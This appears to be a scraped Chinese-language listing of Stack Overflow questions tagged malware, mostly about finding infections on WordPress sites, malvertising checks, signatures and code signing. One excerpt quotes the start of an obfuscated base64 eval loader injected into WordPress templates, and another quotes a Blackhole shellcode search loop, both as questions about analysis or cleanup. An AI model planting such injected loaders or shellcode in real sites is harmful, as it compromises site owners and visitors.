malware

    0熱度

    2回答

    僞裝成WordPress安裝的惡意軟件

    我們網站的一些用戶在訪問該網站時已經開始報告「特洛伊威脅」。聽到這個消息後,我搜索了惡意代碼,但無法找到它。 我安裝了Sucuci SiteCheck插件,並報告瞭如下: http://sitecheck.sucuri.net/scanner/?&scan=http://www.londonirishcentre.org 有沒有人有任何想法如何找到流浪的代碼?我知道一個新鮮的WP安裝將是最好的,但
    php wordpress virus malware trojan 2012-05-10

    5熱度

    1回答

    基於硒的惡意軟件(惡意廣告)檢查 - 幾個問題

    我們最近遇到了一個問題,即通過第三方購買廣告的廣告客戶通過他們購買的廣告散佈惡意軟件。 這導致谷歌黑名單我們的網站屬性很短的時間。 現在已解決此問題。 發生這種情況後,我們決定我們會自我滿足我們的廣告客戶。 在網絡搜索提供此服務的服務後,我們發現了一些... Armorize(www.armorize.com)等提供此類服務。但在通過電話與他們的銷售談話後,我們發現他們收取這項服務約10萬美元至1
    api selenium malware safe-browsing 2012-05-15

    1熱度

    3回答

    學習WinAPI的 - 對於初學者

    可能重複的建議: A good book to understand WinAPI programming? 我最近一直在我的C​​ ++的技能,在過去6個月,並想了解更多有關WinAPI的。我看過一些在線教程,但覺得我可能對他們有點太過分了。我期待學習惡意軟件分析,所以我非常有興趣成爲WinAPI的專家。 我知道亞馬遜上有幾本書(Petzold's或Windows系統編程)有沒有人有任何他們會推
    c++ winapi malware 2012-03-27

    0熱度

    4回答

    二維碼惡意軟件

    我讀了幾篇關於這方面的文章(例如,How QR Codes can Deliver Malware),它似乎創造了非常嗡嗡聲。 從我讀到的所有所謂的「惡意軟件」都是指向惡意網站或應用程序的鏈接。我的問題是:是否有其他形式的QR碼惡意軟件?如果沒有,那麼這種類型的惡意軟件有什麼新的?
    mobile qr-code malware 2012-05-18

    0熱度

    2回答

    Shellcode搜索字節字符串:0C330408Bh

    我正在學習惡意軟件(Blackhole Exploit)的工作,我從惡意代碼中提取shellcode。除了搜索字節字符串外,我找出了所有的東西。誰可以幫我這個事?爲什麼這個shellcode(大多數惡意shellcode)搜索這個特定的字符串? 的搜索代碼是這樣的: mov eax, 0C330408BH; inc esi cmp dword ptr [esi], eax jne //bac
    assembly reverse-engineering malware shellcode malware-detection 2012-05-18

    0熱度

    3回答

    該網站上的惡意軟件按谷歌,但我無法找到它

    昨天當我來到我的網站之一我收到來自谷歌的警告,說我的網站上有惡意軟件。我查看了代碼,確實有一些JavaScript不應該在那裏。我GOOGLE了它,並沒有發現任何有用的東西。當我回到我的網站時,該代碼已經消失,但谷歌(當從搜索引擎訪問該網站時)和谷歌瀏覽器仍然給我一個警告,說我的網站上有惡意軟件。 我看着網站管理員工具,他們發現有幾個頁面存在問題。其中之一是http://www.keramikfl
    malware 2012-05-30

    -1熱度

    1回答

    Wordpress惡意軟件注入index.php模板

    嘿傢伙,所以我最近發現,我的服務器上我所有的WordPress的安裝index.php模板文件注入了此代碼。 <?php eval(base64_decode('JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQ
    wordpress base64 code-injection malware 2012-07-19

    0熱度

    1回答

    NOD32說這個代碼有木馬,我想查找惡意代碼的行數

    這是一個wordpress主題的function.php,NOD32說這個代碼有一個名爲JS/Redirector.NIL的木馬的木馬,請幫助我查找惡意代碼的行數。我寫的整個代碼的打擊: <?php if (function_exists('register_sidebar')) register_sidebar(array('name'=>'right', 'before_widget'
    php wordpress antivirus malware nod32 2012-04-11

    1熱度

    1回答

    病毒特徵碼的最小長度

    我還沒有找到任何有關此信息。是否有病毒簽名所需的最小長度?我在Peter Szor的書中讀到,對於16位應用程序來說,16字節就足以避免誤報。對於32位和64位應用程序是否還有最低等級? 謝謝。
    antivirus virus malware malware-detection virus-scanning 2012-04-15

    2熱度

    1回答

    代碼簽名的Windows實現

    我找不到有關在Windows(特別是PE可執行文件)中如何實現代碼簽名的任何特定信息。 我只找到很多關於如何簽名應用程序的教程,但這不是我想要的。我正在尋找低級別的細節。 我正在寫一篇關於安全性和數據完整性的文章,並且無法找到任何有關已簽名代碼是否可能被惡意軟件「未簽名」的信息。 謝謝。
    windows security code-signing portable-executable malware 2012-04-19
最新問題